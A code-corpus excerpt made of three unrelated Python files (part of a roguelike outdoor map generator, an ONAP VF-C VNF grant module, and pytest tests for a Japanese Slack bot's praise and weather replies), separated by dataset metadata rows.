print('Raising the southern hills')
dy = new_map.height - peak[1]
x_intercept = peak[0] + dy / 2
for r in range(len(new_map.region_seeds)):
seed = new_map.region_seeds[r]
if new_map.region_elevations[r] > 4:
continue
if seed[1] < peak[1]:
continue
local_dy = seed[1] - peak[1]
midline = peak[0] + local_dy / 2
dx = abs(midline - seed[0])
if (dx > 40):
continue
e = int(4 - dx / 10)
if new_map.region_elevations[r] < e:
new_map.region_elevations[r] = e
def _place_seaside_height(new_map):
"""
Guarantee that there's at least one elevated spot along the seaside
"""
for r in range(20, 80):
if (new_map.region_elevations[r] >= 2 and
new_map.region_terrain[r-20] == 'lake'):
new_map.grotto_region = r
return
# Rather than looking for a "best" location,
# place it as soon as possible.
for r in range(20, 80):
print(r, new_map.region_terrain[r], new_map.region_elevations[r])
if (new_map.region_terrain[r] == 'lake' or
new_map.region_terrain[r] == 'marsh'):
continue
if new_map.region_terrain[r-20] != 'lake':
print('Not lakeside...')
continue
new_map.region_elevations[r] = 1
new_map.region_terrain[r] = 'scrub'
new_map.grotto_region = r
if (r+1)/20 == r/20:
new_map.region_elevations[r+1] = 2
new_map.region_terrain[r+1] = 'forest'
new_map.grotto_region = r
if (r+2)/20 == r/20:
new_map.region_elevations[r+2] = 1
new_map.region_terrain[r+2] = 'scrub'
return
print("Whoops! Can't find anywhere to place a seaside grotto.")
new_map.grotto_region = None
def _should_slope(new_map, x, y):
"""
True if any adjacent tile is higher than this one.
"""
el = new_map.region_elevations[new_map.region[x][y]]
return (new_map.elevation(x-1, y-1) == el+1 or
new_map.elevation(x, y-1) == el+1 or
new_map.elevation(x+1, y-1) == el+1 or
new_map.elevation(x-1, y) == el+1 or
new_map.elevation(x+1, y) == el+1 or
new_map.elevation(x-1, y+1) == el+1 or
new_map.elevation(x, y+1) == el+1 or
new_map.elevation(x+1, y+1) == el+1)
def _find_terrain_types(new_map):
strata = { x : [] for x in map.region_colors_seen.keys() }
for r in range(len(new_map.region_terrain)):
type = strata.get(new_map.region_terrain[r])
type.append(r)
return strata
def _mark_slopes(new_map):
print('Finding the slopes')
for x in range(1, config.OUTDOOR_MAP_WIDTH - 1):
for y in range(1, config.OUTDOOR_MAP_HEIGHT - 1):
if _should_slope(new_map, x, y):
new_map.terrain[x][y] = map.TERRAIN_SLOPE
def _clump_terrain(new_map):
print('Determining terrain clumps')
for r in range(len(new_map.region_seeds)):
el = new_map.region_elevations[r]
seed = new_map.region_seeds[r]
if el == 0:
# Fill in the upper-left-hand-corner so that the mountain
# tends to be flush against the marsh & lake.
in_corner = seed[0] + seed[1] < new_map.width * 0.75
if seed[0] < 20 or (in_corner and seed[0] <= seed[1]):
new_map.region_terrain[r] = 'lake'
elif seed[1] < 20 or (in_corner and seed[1] < seed[0]):
new_map.region_terrain[r] = 'marsh'
else:
new_map.region_terrain[r] = 'desert'
elif el < 3:
new_map.region_terrain[r] = 'scrub'
elif el < 6:
new_map.region_terrain[r] = 'forest'
elif el < 7:
new_map.region_terrain[r] = 'rock'
else:
new_map.region_terrain[r] = 'ice'
def _assign_terrain(new_map):
terrain_lookup = { map.terrain_types[i].name : i
for i in range(len(map.terrain_types)) }
marsh_chances = { 'water' : 10, 'ground' : 40, 'reeds' : 10, 'saxaul' : 10 }
desert_chances = { 'ground' : 80, 'nitraria' : 5, 'ephedra' : 5, 'boulder' : 5 }
scrub_chances = { 'ground' : 40, 'nitraria' : 10, 'ephedra' : 10, 'boulder' : 5 }
forest_chances = { 'ground' : 45, 'poplar' : 15, 'boulder' : 5 }
terrain_chances = {
'lake' : { 'water' : 10 },
'marsh' : marsh_chances,
'desert' : desert_chances,
'scrub' : scrub_chances,
'forest' : forest_chances,
'rock' : { 'ground' : 45, 'boulder' : 5 },
'ice' : { 'ground' : 75, 'boulder' : 5 }
}
print('Assigning narrow terrain')
for x in range(config.OUTDOOR_MAP_WIDTH):
for y in range(config.OUTDOOR_MAP_HEIGHT):
t = new_map.region_terrain[new_map.region[x][y]]
if new_map.terrain[x][y] != map.TERRAIN_GROUND and t != 'lake':
# For now don't overwrite slopes, except underwater
continue
new_map.terrain[x][y] = terrain_lookup[_random_choice(terrain_chances[t])]
def _make_rotunda(new_map, peak):
"""
Create a rotunda on top of the mountain.
This is always at the peak.
"""
for x in range(peak[0]-3, peak[0]+4):
for y in range(peak[1]-3, peak[1]+4):
if new_map.elevation(x, y) != 9:
# in theory would be better to glom onto a closer region
# if one exists
new_map.region[x][y] = new_map.region[peak[0]][peak[1]]
# interior of rotunda is floor, edges are bare ground
if (x > peak[0]-3 and x < peak[0]+3 and
y > peak[1]-3 and y < peak[1]+3):
new_map.terrain[x][y] = map.TERRAIN_FLOOR
elif new_map.terrain[x][y] != map.TERRAIN_SLOPE:
new_map.terrain[x][y] = map.TERRAIN_GROUND
if (x == peak[0]-2 or x == peak[0]+2 or
y == peak[1]-2 or y == peak[1]+2):
# borders have alternating pillars
if ((x - peak[0]) % 2 == 0 and
(y - peak[1]) % 2 == 0):
new_map.terrain[x][y] = map.TERRAIN_WALL
def _test_quarry_placement(new_map, region_span):
"""
Look for a site of a given elevation in a particular consecutive range of regions.
"""
for r in range(region_span[0], region_span[1]):
if new_map.region_elevations[r] == QUARRY_ELEVATION:
return r
return None
def _mark_quarry_slopes(new_map, region):
# BUG still not quite right?
center = new_map.region_seeds[region]
print('Centering quarry at ' + str(center[0]) + ' ' + str(center[1]))
for x in range(max(center[0] - 10, 0), min(center[0] + 10, new_map.width - 1)):
for y in range(max(center[1] - 10, 0), min(center[1] + 10, new_map.height - 1)):
if _should_slope(new_map, x, y):
# add new slopes within the quarry, if necessary
if new_map.region[x][y] != region:
continue
new_map.terrain[x][y] = map.TERRAIN_SLOPE
else:
if new_map.region[x][y] == region:
new_map.terrain[x][y] = map.TERRAIN_GROUND
elif new_map.terrain[x][y] == map.TERRAIN_SLOPE:
# get rid of now-obsolete slopes nearby
new_map.terrain[x][y] = map.TERRAIN_GROUND
def _place_quarry(new_map, peak):
"""
Looks for a site just below the top of the hills,
south and ideally a little east of the peak.
Sets new_map.quarry_regions
"""
peak_region = new_map.region[peak[0]][peak[1]]
column_start = peak_region + 20 * libtcod.random_get_int(0, 0, 2)
column_end = (column_start / 20) * 20 + 19
print('Searching for quarry between ' + str(column_start) + ' and ' + str(column_end))
new_map.quarry_regions = None
q_rgn = _test_quarry_placement(new_map, (column_start, column_end))
if not q_rgn:
q_rgn = _test_quarry_placement(new_map, (column_start+20, column_end+20))
if not q_rgn:
q_rgn = _test_quarry_placement(new_map, (column_start+40, column_end+40))
if not q_rgn:
q_rgn = _test_quarry_placement(new_map, (column_start-20, column_end-20))
if not q_rgn:
q_rgn = _test_quarry_placement(new_map, (column_start-40, column_end-40))
if not q_rgn:
return
new_map.quarry_regions = [q_rgn]
# Extend east, or west if that doesn't work
if new_map.region_elevations[q_rgn+20] > 2:
new_map.quarry_regions += [q_rgn+20]
elif new_map.region_elevations[q_rgn-20] > 2:
new_map.quarry_regions += [q_rgn-20]
print('Quarry regions: ', new_map.quarry_regions)
def _dig_quarry(new_map, peak):
"""
"""
_place_quarry(new_map, peak)
if not new_map.quarry_regions:
print("Couldn't find anywhere to dig a quarry; sorry!")
return
# Doing this as originally envisioned would require switching to per-tile elevation
# instead of per-region elevation.
# Stopgap: drop the entire region, reevaluate for slopes,
# and rewrite terrain.
for rgn in new_map.quarry_regions:
new_map.region_elevations[rgn] = 2
new_map.region_terrain[rgn] = 'rock'
for rgn in new_map.quarry_regions:
_mark_quarry_slopes(new_map, rgn)
stairheads = []
for ii in range(MINE_ENTRANCE_COUNT):
while True:
rgn = new_map.quarry_regions[_random_choice_index([1 for ii in range(len(new_map.quarry_regions))])]
pos = _random_position_in_region(new_map, rgn)
sufficiently_distant = True
for stair_pos in stairheads:
# print('distance between ', pos, stair_pos, pos.distance(stair_pos))
if pos.distance(stair_pos) < 5:
sufficiently_distant = False
# Maybe try to enforce that it's near a cliff / slope...
if sufficiently_distant:
break
stairheads.append(pos)
# Arrange west-to-east to make it easier to dig below
stairheads.sort(key = lambda pos : pos.x)
new_map.quarry_stairs = []
for ii in stairheads:
stairs = Object(ii, '<', 'mine entrance', libtcod.white, always_visible=True)
stairs.destination = None
stairs.dest_position = None
stairs.generator = mine_cartographer.make_map
new_map.objects.insert(0, stairs)
new_map.portals.insert(0, stairs)
new_map.quarry_stairs.append(stairs)
def _make_grotto(new_map):
if not new_map.grotto_region:
return
region_center = algebra.Location(new_map.region_seeds[new_map.grotto_region][0],
new_map.region_seeds[new_map.grotto_region][1])
print('Grotto at ' + str(region_center.x) + ' ' + str(region_center.y))
stairs = Object(region_center, '<', 'cave mouth', libtcod.white, always_visible=True)
stairs.destination = None
stairs.dest_position = None
stairs.generator = ca_cartographer.make_map
new_map.objects.insert(0, stairs)
new_map.portals.insert(0, stairs)
new_map.grotto_stairs = region_center
# Would be nice to have a structure around it, but for now just keep the top clear.
for x in range(region_center.x - 2, region_center.x + 3):
for y in range(region_center.y - 2, region_center.y + 3):
if (new_map.region[x][y] == new_map.grotto_region
and new_map.terrain[x][y] != map.TERRAIN_SLOPE):
new_map.terrain[x][y] = map.TERRAIN_GROUND
def _check_stair_position(stairheads, candidate):
for prev_pos in stairheads:
if candidate.distance(prev_pos) < 20:
return False
return True
def _site_final_dungeon(new_map, strata):
other_stairs = new_map.quarry_stairs + [new_map.grotto_stairs]
stairheads = []
for type in ['rock', 'forest', 'forest']:
regions = strata[type]
while True:
r = regions[new_map.rnd(0, len(regions) - 1)]
pos = _random_position_in_region(new_map, r)
if _check_stair_position(stairheads + other_stairs, pos):
break
stairheads.append(pos)
print('Final dungeon entrance at ', pos)
stairheads.sort(key = lambda pos : pos.x)
new_map.dungeon_stairs = []
for ii in stairheads:
new_map.terrain[ii.x][ii.y] = map.TERRAIN_GROUND
stairs = Object(ii, '<', 'cave mouth', libtcod.white, always_visible=True)
stairs.destination = None
stairs.dest_position = None
stairs.generator = dungeon_cartographer.make_final_map
new_map.objects.insert(0, stairs)
new_map.portals.insert(0, stairs)
new_map.dungeon_stairs.append(stairs)
for x in range(ii.x - 2, ii.x + 3):
for y in range(ii.y - 2, ii.y + 3):
if (new_map.region[x][y] == new_map.region[ii.x][ii.y]
and new_map.terrain[x][y] != map.TERRAIN_SLOPE):
new_map.terrain[x][y] = map.TERRAIN_GROUND
def _debug_region_heights(new_map):
for u in range(20):
print(new_map.region_elevations[u:400:20])
def _debug_region_terrain(new_map):
rt = ''
for r in range(len(new_map.region_seeds)):
if new_map.region_terrain[r] != None:
rt += new_map.region_terrain[r][0]
else:
rt += str(new_map.region_elevations[r])
for u in range(20):
print(rt[u:400:20])
def _build_map(new_map):
new_map.rng = libtcod.random_new_from_seed(new_map.random_seed)
print('Seeding regions')
for u in range(config.OUTDOOR_MAP_WIDTH / 10):
for v in range(config.OUTDOOR_MAP_HEIGHT / 10):
x = libtcod.random_get_int(new_map.rng, 0, 9) + u * 10
y = libtcod.random_get_int(new_map.rng, 0, 9) + v * 10
new_map.region_seeds.append([x, y])
print('Growing the world-tree')
region_tree = scipy.spatial.KDTree(new_map.region_seeds)
new_map.region_terrain = [None for i in range(len(new_map.region_seeds))]
new_map.region_elevations = [-1 for r in range(len(new_map.region_seeds))]
new_map.region_entered = [False for i in range(len(new_map.region_seeds))]
new_map.elevation_visited = [False for i in range(0,10)]
print('Assigning regions')
for x in range(config.OUTDOOR_MAP_WIDTH):
for y in range(config.OUTDOOR_MAP_HEIGHT):
(d, i) = region_tree.query([[x, y]])
new_map.region[x][y] = i[0]
new_map.terrain[x][y] = map.TERRAIN_GROUND
peak = [libtcod.random_get_int(new_map.rng, int(config.OUTDOOR_MAP_WIDTH * .35), int(config.OUTDOOR_MAP_WIDTH * .65)),
libtcod.random_get_int(new_map.rng, int(config.OUTDOOR_MAP_WIDTH * .35), int(config.OUTDOOR_MAP_WIDTH * .65))]
print('The peak is at ' + str(peak[0]) + ', ' + str(peak[1]))
for r in range(20):
new_map.region_elevations[r] = 0
new_map.region_elevations[380+r] = 0
new_map.region_elevations[r*20] = 0
new_map.region_elevations[r*20+19] = 0
(d, peak_regions) = region_tree.query([peak], 3)
for p in peak_regions[0]:
new_map.region_elevations[p] = 9
_interpolate_heights(new_map, peak)
_ensure_penultimate_height(new_map, peak, region_tree)
_extend_hills(new_map, peak)
_debug_region_heights(new_map)
_clump_terrain(new_map)
_place_seaside_height(new_map)
# TODO: level_desert() here to guarantee caravanserai is in the northeast
# TODO: sink_quarry() here before we _mark_slopes
# to get rid of messy after-the-fact slope fixup in dig_quarry()
strata = _find_terrain_types(new_map)
_debug_region_terrain(new_map)
_mark_slopes(new_map)
_assign_terrain(new_map)
_make_rotunda(new_map, peak)
compound_cartographer.make_caravanserai(new_map)
_dig_quarry(new_map, peak)
_make_grotto(new_map)
_site_final_dungeon(new_map, strata)
new_map.peak = peak
def _mountain_exploration(self, player):
new_region = self.region[player.pos.x][player.pos.y]
new_elevation = self.region_elevations[new_region]
delta = 0
if not self.region_entered[new_region]:
delta += config.REGION_EXPLORATION_SP
self.region_entered[new_region] = True
if not self.elevation_visited[new_elevation]:
delta += config.ELEVATION_EXPLORATION_SP
self.elevation_visited[new_elevation] = True
if delta > 0:
player.skill_points += delta
point = 'point'
if delta > 1:
point += 's'
log.message('You gained ' + str(delta) + ' skill ' + point + ' for exploration.')
def make_map(player, dungeon_level):
"""
Creates a new simple map at the given dungeon level.
Sets player.current_map to the new map, and adds the player as the first
object.
"""
new_map = map.OutdoorMap(config.OUTDOOR_MAP_WIDTH, config.OUTDOOR_MAP_HEIGHT, dungeon_level)
new_map.objects.append(player)
player.current_map = new_map
player.camera_position = algebra.Location(0, 0)
new_map.random_seed = libtcod.random_save(0)
_build_map(new_map)
# Might want to change this later, but this is required in creature placement
# routines so we know what region the player starts in so there isn't a
# wandering monster jumping down their throat. Unless, of course, this
# start point is on a *region border* and there's a monster in the next
# region over...
player.pos = algebra.Location(config.OUTDOOR_MAP_WIDTH - 8, 12)
_place_random_creatures(new_map, player)
_inhabit_rotunda(new_map, new_map.peak)
if new_map.caravanserai:
compound_cartographer.inhabit_caravanserai(new_map, player)
if new_map.quarry_regions:
_inhabit_quarry(new_map, player)
# make sure we're not starting on top of an object or terrain feature
while (new_map.terrain_at(player.pos).name != 'ground'):
# subtle bug? doesn't use the map-building random number generator
player.pos = player.pos + actions.random_direction()
player.pos.bound(algebra.Rect(0, 0, new_map.width - 1, new_map.height - 1))
new_map.initialize_fov()
# setting an instancemethod breaks shelve save games
# new_map.xp_visit = type(map.BaseMap.xp_visit)(_mountain_exploration, new_map, map.BaseMap)
new_map.xp_visit = _mountain_exploration
return True
def _test_map_repeatability():
"""
Require that two calls to _build_map() with the same seed produce the
same corridors and rooms.
"""
map1 = map.OutdoorMap(config.MAP_WIDTH, config.MAP_HEIGHT, 3)
map1.random_seed = libtcod.random_save(0)
_build_map(map1)
map2 = map.OutdoorMap(config.MAP_WIDTH, config.MAP_HEIGHT, 3)
map2.random_seed = map1.random_seed
_build_map(map2)
assert map1.terrain == map2.terrain
for i in range(len(map1.rooms)):
assert map1.rooms[i] == map2.rooms[i]
if __name__ == '__main__':
_test_map_repeatability()
print('Cartographer tests complete.')
| 36.677563 | 122 | 0.624777 | 3,564 | 24,684 | 4.102974 | 0.138889 | 0.100527 | 0.073036 | 0.045134 | 0.442249 | 0.333311 | 0.24694 | 0.20413 | 0.168433 | 0.141626 | 0 | 0.023141 | 0.264706 | 24,684 | 672 | 123 | 36.732143 | 0.782534 | 0.117526 | 0 | 0.201245 | 0 | 0 | 0.045594 | 0 | 0 | 0 | 0 | 0.001488 | 0.004149 | 1 | 0.060166 | false | 0 | 0.037344 | 0 | 0.134855 | 0.051867 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c869ea13c57d3dfb524eb647b6f3d5f86eafa6e | 7,307 | py | Python | test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns_vnfs/biz/grant_vnf.py | lremember/VFC | 837559db1396091811382359100bfc60e1aab5b2 | [
"MIT"
] | 1 | 2019-10-10T00:52:18.000Z | 2019-10-10T00:52:18.000Z | test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns_vnfs/biz/grant_vnf.py | lremember/VFC-Files | 837559db1396091811382359100bfc60e1aab5b2 | [
"MIT"
] | null | null | null | test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns_vnfs/biz/grant_vnf.py | lremember/VFC-Files | 837559db1396091811382359100bfc60e1aab5b2 | [
"MIT"
] | null | null | null | # Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import uuid
import time
from lcm.pub.database.models import NfInstModel, OOFDataModel
from lcm.pub.exceptions import NSLCMException
from lcm.pub.msapi.sdc_run_catalog import query_vnfpackage_by_id
from lcm.pub.utils.values import ignore_case_get
from lcm.pub.msapi import resmgr
from lcm.ns_vnfs.const import SCALAR_UNIT_DICT
logger = logging.getLogger(__name__)
class GrantVnf(object):
def __init__(self, grant_data):
self.data = grant_data
def exec_grant(self):
logger.debug("grant data from vnfm:%s", self.data)
if isinstance(self.data, str):
self.data = json.JSONDecoder().decode(self.data)
has_res_tpl = False
grant_type = None
action_type = ignore_case_get(self.data, "operation")
vimConnections = []
if ignore_case_get(self.data, "addResources"):
grant_type = "addResources"
elif ignore_case_get(self.data, "removeResources"):
grant_type = "removeResources"
else:
has_res_tpl = True
for res in ignore_case_get(self.data, grant_type):
if "resourceTemplate" in res:
has_res_tpl = True
break
if not has_res_tpl:
m_vnf_inst_id = ignore_case_get(self.data, "vnfInstanceId")
additional_param = ignore_case_get(self.data, "additionalparams")
vnfm_inst_id = ignore_case_get(additional_param, "vnfmid")
vim_id = ignore_case_get(additional_param, "vimid")
if vnfm_inst_id and vnfm_inst_id != "":
vnfinsts = NfInstModel.objects.filter(
mnfinstid=m_vnf_inst_id, vnfm_inst_id=vnfm_inst_id)
else:
vnfinsts = NfInstModel.objects.filter(
mnfinstid=m_vnf_inst_id)
if not vnfinsts:
raise NSLCMException("Vnfinst(%s) is not found in vnfm(%s)" % (
m_vnf_inst_id, vnfm_inst_id))
vnf_pkg_id = vnfinsts[0].package_id
nfpackage_info = query_vnfpackage_by_id(vnf_pkg_id)
vnf_pkg = nfpackage_info["packageInfo"]
vnfd = json.JSONDecoder().decode(vnf_pkg["vnfdModel"])
req_param = {
"vnfInstanceId": m_vnf_inst_id,
"vimId": vim_id,
"vnfLcmOpOccId": ignore_case_get(self.data, "vnfLcmOpOccId"),
"additionalParams": additional_param,
grant_type: []
}
for res in ignore_case_get(self.data, grant_type):
vdu_name = ignore_case_get(res, "vdu")
grant_res = {
"resourceDefinitionId": ignore_case_get(res, "resourceDefinitionId"),
"type": ignore_case_get(res, "type"),
"vdu": vdu_name
}
for vdu in vnfd["vdus"]:
if vdu_name in (vdu["vdu_id"], vdu["properties"].get("name", "")):
grant_res["resourceTemplate"] = self.get_res_tpl(vdu, vnfd)
break
req_param[grant_type].append(grant_res)
self.data = req_param
tmp = resmgr.grant_vnf(self.data)
vimConnections.append(
{
"id": tmp["vim"]["vimId"],
"vimId": tmp["vim"]["vimId"],
"vimType": None,
"interfaceInfo": None,
"accessInfo": tmp["vim"]["accessInfo"],
"extra": None
}
)
grant_resp = {
"id": str(uuid.uuid4()),
"vnfInstanceId": ignore_case_get(self.data, 'vnfInstanceId'),
"vnfLcmOpOccId": ignore_case_get(self.data, "vnfLcmOpOccId"),
"vimConnections": vimConnections
}
logger.debug("action_type=%s" % action_type)
if action_type == 'INSTANTIATE':
for i in range(18):
offs = OOFDataModel.objects.filter(service_resource_id=ignore_case_get(self.data, "vnfInstanceId"))
if not (offs.exists() and offs[0].vdu_info):
logger.debug("Cannot find oof data, retry%s" % (i + 1))
time.sleep(5)
continue
try:
vdu_info = json.loads(offs[0].vdu_info)
grant_resp['vimAssets'] = {'computeResourceFlavours': []}
for vdu in vdu_info:
grant_resp['vimAssets']['computeResourceFlavours'].append({
'vimConnectionId': offs[0].vim_id,
'resourceProviderId': vdu.get("vduName"),
'vnfdVirtualComputeDescId': None, # TODO: required
'vimFlavourId': vdu.get("flavorId")
})
# grant_resp['additionalparams'][off.vim_id] = off.directive
except Exception:
logger.debug("Load OOF data error")
break
logger.debug("grant_resp=%s", grant_resp)
return grant_resp
def get_res_tpl(self, vdu, vnfd):
storage_size = 0
for storage_id in vdu["local_storages"]:
storage_size = storage_size + self.get_storage_size(storage_id, vnfd)
resourceTemplate = {
"virtualComputeDescriptor": {
"virtualCpu": {
"numVirtualCpu": int(vdu["virtual_compute"]["virtual_cpu"]["num_virtual_cpu"])
},
"virtualMemory": {
"virtualMemSize": parse_unit(vdu["virtual_compute"]["virtual_memory"]["virtual_mem_size"], "MB")
}
},
"virtualStorageDescriptor": {
"typeOfStorage": "",
"sizeOfStorage": storage_size,
"swImageDescriptor": ""
}
}
return resourceTemplate
def get_storage_size(self, storage_id, vnfd):
for storage in vnfd["local_storages"]:
if storage_id == storage["local_storage_id"]:
return parse_unit(storage["properties"]["size"], "GB")
return 0
def parse_unit(val, base_unit):
# recognized_units = ["B", "kB", "KiB", "MB", "MiB", "GB", "GiB", "TB", "TiB"]
# units_rate = [1, 1000, 1024, 1000000, 1048576, 1000000000, 1073741824, 1000000000000, 1099511627776]
# unit_rate_map = {unit.upper(): rate for unit, rate in zip(recognized_units, units_rate)}
num_unit = val.strip().split(" ")
if len(num_unit) != 2:
return val.strip()
num, unit = num_unit[0], num_unit[1]
return int(num) * SCALAR_UNIT_DICT[unit.upper()] / SCALAR_UNIT_DICT[base_unit.upper()]
| 41.754286 | 116 | 0.575065 | 800 | 7,307 | 5.015 | 0.315 | 0.035892 | 0.055085 | 0.04661 | 0.166002 | 0.140578 | 0.09322 | 0.044367 | 0.044367 | 0.018943 | 0 | 0.01828 | 0.318735 | 7,307 | 174 | 117 | 41.994253 | 0.787666 | 0.122896 | 0 | 0.092199 | 0 | 0 | 0.160876 | 0.018466 | 0 | 0 | 0 | 0.005747 | 0 | 1 | 0.035461 | false | 0 | 0.070922 | 0 | 0.156028 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c86fc3cc7d33b4cf70c509d1568b79a22d1d208 | 5,877 | py | Python | tests/test_oyashiki.py | maidnomad/maidchan-slackbot | 42364c2ffef60211a1d5be53f7d3ff1922418abd | [
"MIT"
] | null | null | null | tests/test_oyashiki.py | maidnomad/maidchan-slackbot | 42364c2ffef60211a1d5be53f7d3ff1922418abd | [
"MIT"
] | null | null | null | tests/test_oyashiki.py | maidnomad/maidchan-slackbot | 42364c2ffef60211a1d5be53f7d3ff1922418abd | [
"MIT"
] | null | null | null | from unittest import mock
import freezegun
import pytest
@pytest.fixture
def target():
from maidchan.tasks import お屋敷のお仕事をする
return お屋敷のお仕事をする
@pytest.mark.parametrize(
"text, expected",
[
("メイドちゃん!褒めて!", "<@00000000>さん!すごーい!"),
("メイドちゃん!私を褒めて!", "<@00000000>さん!すごーい!"),
("メイドちゃん!頑張った僕を褒めて!", "<@00000000>さん、頑張ったんだ!すごーい!"),
("メイドちゃん!テストで一位の僕を褒めて!", "<@00000000>さん、テストで一位なんだ!すごーい!"),
("メイドちゃん!早起きした<@00000001>を褒めて!", "<@00000001>さん、早起きしたんだ!すごーい!"),
("あはははあhvうぇjprgsdv", None), # 無関係なメッセージ
],
)
def test_text_response(target, text, expected):
"""テキストに対するレスポンスが仕様通りであること"""
actual = target({"user_id": "00000000", "text": text})
assert actual == expected
@pytest.mark.parametrize(
"text, expected",
[
("メイドちゃん!今日の天気を教えて!", "今日の東京都秋葉原地方の天気は *晴れ* 、最高気温は 30度 です!"),
("メイドちゃん!明日の天気を教えて!", "明日の東京都秋葉原地方の天気は *曇り* 、最高気温は 20度 です!"),
("メイドちゃん!明後日の天気を教えて!", "明後日の東京都秋葉原地方の天気は *雨* 、最高気温は 10度 です! *傘を忘れないで!!* "),
],
)
def test_weather_by_date_label(target, text, expected):
"""天気予報機能で今日、明日、明後日の指定が正しくできること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
"telop": "晴れ",
"temperature": {"max": {"celsius": "30"}},
},
1: {
"dateLabel": "明日",
"telop": "曇り",
"temperature": {"max": {"celsius": "20"}},
},
2: {
"dateLabel": "明後日",
"telop": "雨",
"temperature": {"max": {"celsius": "10"}},
},
},
"location": {"prefecture": "東京都", "district": "秋葉原地方"},
}
actual = target({"user_id": "00000000", "text": text})
assert actual == expected
@pytest.mark.parametrize(
"prefecture, district, expected",
[
("東京都", "東京地方", "今日の東京地方の天気は *晴れ* 、最高気温は 30度 です!"),
("大阪府", "大阪府", "今日の大阪府の天気は *晴れ* 、最高気温は 30度 です!"),
("広島県", "南部", "今日の広島県南部の天気は *晴れ* 、最高気温は 30度 です!"),
],
)
def test_weather_fix_location_name(target, prefecture, district, expected):
"""天気予報機能で東京都東京地方、大阪府大阪府など微妙な地域名を補正すること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
"telop": "晴れ",
"temperature": {"max": {"celsius": "30"}},
},
},
"location": {"prefecture": prefecture, "district": district},
}
actual = target({"user_id": "00000000", "text": "メイドちゃん!今日の大阪の天気を教えて!"})
assert actual == expected
@pytest.mark.parametrize(
"time, expected",
[
("08:00:00+09:00", "今日の東京都秋葉原地方の天気は *晴れ* 、最高気温は 30度 です!"),
("17:59:59+09:00", "今日の東京都秋葉原地方の天気は *晴れ* 、最高気温は 30度 です!"),
("18:00:00+09:00", "明日の東京都秋葉原地方の天気は *曇り* 、最高気温は 20度 です!"),
("20:00:00+09:00", "明日の東京都秋葉原地方の天気は *曇り* 、最高気温は 20度 です!"),
],
)
def test_weather_by_current_time(target, time, expected):
"""天気予報機能で現在時刻に応じて、今日か明日のとりわけが正しくできること"""
with freezegun.freeze_time("2021-07-18 " + time) as _, mock.patch(
"maidchan.tasks.天気予報._call_weather_api"
) as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
"telop": "晴れ",
"temperature": {"max": {"celsius": "30"}},
},
1: {
"dateLabel": "明日",
"telop": "曇り",
"temperature": {"max": {"celsius": "20"}},
},
},
"location": {"prefecture": "東京都", "district": "秋葉原地方"},
}
actual = target({"user_id": "00000000", "text": "メイドちゃん!天気を教えて!"})
assert actual == expected
def test_weather_responded_error(target):
"""天気予報機能でAPIエラーの時の挙動が仕様通りであること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.side_effect = Exception
actual = target({"user_id": "00000000", "text": "メイドちゃん!天気を教えて!"})
assert actual == "今日の天気は分かりません(;_;)"
def test_weather_by_unknown_response(target):
"""天気予報機能でAPIのレスポンスが想定外の形式の時のメッセージが仕様通りであること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
}
},
"location": {"prefecture": "東京都", "district": "秋葉原地方"},
}
actual = target({"user_id": "00000000", "text": "メイドちゃん!今日の天気を教えて!"})
assert actual == "今日の東京都秋葉原地方の天気は *わかりません* 、最高気温は わかりません です!"
@pytest.mark.parametrize(
"text, city_id",
[
("メイドちゃん!今日の大阪の天気を教えて!", "270000"),
("メイドちゃん!今日の仙台の天気を教えて!", "040010"),
("メイドちゃん!今日の天気を教えて!", "130010"),
],
)
def test_weather_by_city(target, text, city_id):
"""天気予報機能で都市の指定が正しくできること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
"telop": "晴れ",
"temperature": {"max": {"celsius": "30"}},
},
},
"location": {"prefecture": "東京都", "district": "秋葉原地方"},
}
target({"user_id": "00000000", "text": text})
mock_call_weather_api.assert_called_with(city_id)
